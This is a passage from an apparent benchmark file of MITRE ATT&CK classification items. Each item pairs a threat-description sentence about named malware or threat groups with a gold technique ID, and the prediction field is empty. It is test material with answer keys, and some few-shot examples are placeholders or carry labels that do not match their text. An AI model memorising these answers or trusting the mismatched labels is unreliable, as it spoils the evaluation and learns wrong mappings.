ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuasarRAT has a module for performing remote desktop access.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Crimson can perform audio surveillance using microphones.\n\t - T1123: Audio Capture\n- Text: APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims.\n\t - T1003: OS Credential Dumping\n", + "input": "Revenge RAT has a plugin to perform RDP access.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.\n\t - T1095: Non-Application Layer Protocol\n- Text: Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.\n\t - T1571: Non-Standard Port\n- Text: CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment\n\t - T1090: Proxy\n\t - T1021.004: Remote Services - SSH\n\t - T1572: Protocol Tunneling\n", + "input": "Crimson uses a custom TCP protocol for C2.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation.\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: Octopus can collect the username from the victim\u2019s machine.\n\t - T1033: System Owner/User Discovery\n- Text: can execute a payload on a remote host with PowerShell. This technique does write any data to disk.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "CreepySnail can execute `getUsername` on compromised systems.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Gelsemium has used unverified signatures on malicious DLLs.\n\t - T1036.001: Masquerading - Invalid Code Signature\n- Text: The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", + "input": "Janicab used a valid AppleDeveloperID to sign the code to get past security restrictions.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1105: Ingress Tool Transfer\n\t - T1102.002: Web Service - Bidirectional Communication\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.\n\t - T1124: System Time Discovery\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: runs the ifconfig command to obtain the IP address from the victim\u2019s machine.\n\t - T1016: System Network Configuration Discovery\n", + "input": "InvisiMole gathers the local system time from the victim\u2019s machine.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT3 has a tool that can delete files.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: APT29 used SDelete to remove artifacts from victims.\n\t - T1070: Indicator Removal\n- Text: njRAT is capable of manipulating and deleting registry keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "PowerShower has the ability to remove all files created during the dropper process.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For Operation Spalax, the threat actors used XOR-encrypted payloads.\n\t - T1027: Obfuscated Files or Information\n- Text: After decoding and decrypting with the XOR key \u201cDARKMATTER\u201d it gets the real C&C URL \u2018banhamm.com\u2018.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "menuPass has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be used to set up a proxy tunnel to allow remote host access to an infected host.\n\t - T1090: Proxy\n- Text: Hikit supports peer connections.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Rising Sun variants can use SSL for encrypting C2 communications.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "XTunnel relays traffic between a C2 server and a victim.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The majority of 2017 and 2018 Karagany samples analyzed by CTU researchers were packed using a custom packer, albeit a reasonably simple one that performs a number of binary shifts and logic operations. Karagany campaigns in 2016 and prior typically used the UPX packer as an additional layer of obfuscation, but this behavior was not observed in 2017-2018 samples. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Cuba loaded the payload into memory using PowerShell.\n\t - T1620: Reflective Code Loading\n- Text: To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink (https://github.com/crosire/blink), which never gets executed\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "Donut can generate packed code modules.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.\n\t - T1029: Scheduled Transfer\n- Text: Janicab\u2019s features also remind us of Powersing\u2019s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim\u2019s desktop to the C&C and appears to enable the execution of arbitrary Python scripts.\n\t - T1113: Screen Capture\n\t - T1497: Virtualization/Sandbox Evasion\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "Bumblebee has the ability to set a hardcoded and randomized sleep interval.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Siloscape searches for the kubectl binary.\n\t - T1518: Software Discovery\n- Text: The files are encrypted with a randomly generated 128-bit AES key in CBC mode with a NULL initialization vector. The key is generated per file, is encrypted with the generated RSA public key, and included in the encrypted file header. Each file encrypted by the malware starts with the string WANACRY. and has the WNCRY extension. Depending on the file properties, the malware may also stage files in a WNCRYT extension\n\t - T1083: File and Directory Discovery\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n", + "input": "Mustang Panda has searched the victim system for the \"InstallUtil.exe\" program and its version.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses various WMI queries to check if the sample is running in a sandbox.\n\t - T1047: Windows Management Instrumentation\n- Text: FELIXROOT checks for installed security software like antivirus and firewall.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n", + "input": "The DustySky dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: WindTail has been incompletely signed with revoked certificates.\n\t - T1036.001: Masquerading - Invalid Code Signature\n", + "input": "PipeMon, its installer, and tools are signed with stolen code-signing certificates.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1137.003\n- Text: OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.\n\t - T1137.004: Office Application Startup - Outlook Home Page\n- Text: No matching sample found for T1137.005\n", + "input": "Ruler can be used to automate the abuse of Outlook Forms to establish persistence.", + "gold": "- T1137.003: Office Application Startup - Outlook Forms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim.\n\t - T1070: Indicator Removal\n- Text: Pillowmint can uninstall the malicious service from an infected machine.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: No matching sample found for T1070.007\n", + "input": "SUNBURST removed HTTP proxy registry values to clean up traces of execution.", + "gold": "- T1070: Indicator Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Remexi executes received commands with wmic.exe (for WMI commands).\n\t - T1047: Windows Management Instrumentation\n- Text: No matching sample found for T1562.010\n", + "input": "HALFBAKED can execute PowerShell scripts.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LazyScripter had downloaded additional tools to a compromised host.\n\t - T1105: Ingress Tool Transfer\n- Text: Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The Bazar loader is used to download and execute the Bazar backdoor.\n\t - T1104: Multi-Stage Channels\n", + "input": "Elise can download additional files from the C2 server for execution.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One of the file path name combinations observed was \u2018C:\\ProgramData\\Dacr\\macrse.exe\u2019, also configured in a Crimson \u201cMain Client\u201d sample and used for saving the payload received from the C2 when invoking the usbwrm command\n\t - T1105: Ingress Tool Transfer\n- Text: On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads\n\t - T1583.006: Acquire Infrastructure - Web Services\n\t - T1102: Web Service\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: Hydraq creates a backdoor through which remote attackers can monitor services.\n\t - T1007: System Service Discovery\n", + "input": "UNC2452 downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to the compromised host following initial compromise.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent Tesla can add itself to the Registry as a startup program to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: malware can create a .lnk file and add a Registry Run key to establish persistence.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: ShimRat has registered two registry keys for shim databases.\n\t - T1112: Modify Registry\n", + "input": "CORESHELL has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NanHaiShu can gather information about the victim proxy server.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.003\n- Text: The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not \u2018127.0.0.1\u2019. Both of these methods are also present in the latest Team9 backdoor variants\n\t - T1008: Fallback Channels\n", + "input": "ShimRatReporter gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LookBack can shutdown and reboot the victim machine.\n\t - T1529: System Shutdown/Reboot\n- Text: APT37 has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n- Text: is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.\n\t - T1542.003: Pre-OS Boot - Bootkit\n", + "input": "Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.\n\t - T1082: System Information Discovery\n- Text: QakBot can enumerate a list of installed programs.\n\t - T1518: Software Discovery\n- Text: QUADAGENT gathers the victim username.\n\t - T1033: System Owner/User Discovery\n", + "input": "Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Patchwork used Base64 to encode C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "ThiefQuest exfiltrates targeted file extensions in the \"/Users/\" folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool\n\t - T1018: Remote System Discovery\n\t - T1135: Network Share Discovery\n\t - T1046: Network Service Discovery\n\t - T1087.001: Account Discovery - Local Account\n- Text: OilRig has used brute force techniques to obtain credentials.\n\t - T1110: Brute Force\n- Text: Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "Dragonfly has likely obtained a list of hosts in the victim environment.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: H1N1 has functionality to copy itself to removable media.\n\t - T1091: Replication Through Removable Media\n- Text: Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n\t - T1043: Commonly Used Port\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: PoshC2 contains a module for exploiting SMB via EternalBlue.\n\t - T1210: Exploitation of Remote Services\n", + "input": "Lucifer can use certutil for propagation on Windows hosts within intranets.", + "gold": "- T1570: Lateral Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode\n\t - T1027: Obfuscated Files or Information\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: BendyBear is designed to download an implant from a C2 server.\n\t - T1105: Ingress Tool Transfer\n- Text: Once deployed, Prestige ransomware payloads will drop ransom notes named \"\"README.txt\"\" in the root directory of each drive it encrypts.\n\t - T1486: 